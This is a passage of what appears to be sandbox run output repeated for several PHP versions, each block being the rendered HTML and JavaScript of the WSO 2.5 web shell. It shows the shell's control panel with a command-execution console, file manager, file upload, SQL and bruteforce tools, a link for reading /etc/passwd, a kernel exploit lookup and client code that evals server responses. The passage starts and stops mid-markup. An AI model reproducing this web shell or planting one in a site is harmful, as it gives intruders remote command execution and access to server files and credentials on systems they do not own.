d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.29 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.28
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.28 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.27
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.27 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.26
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.3.26 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>Safe mode exec dir: </span>/usr/local/php/bin<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.3.25
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 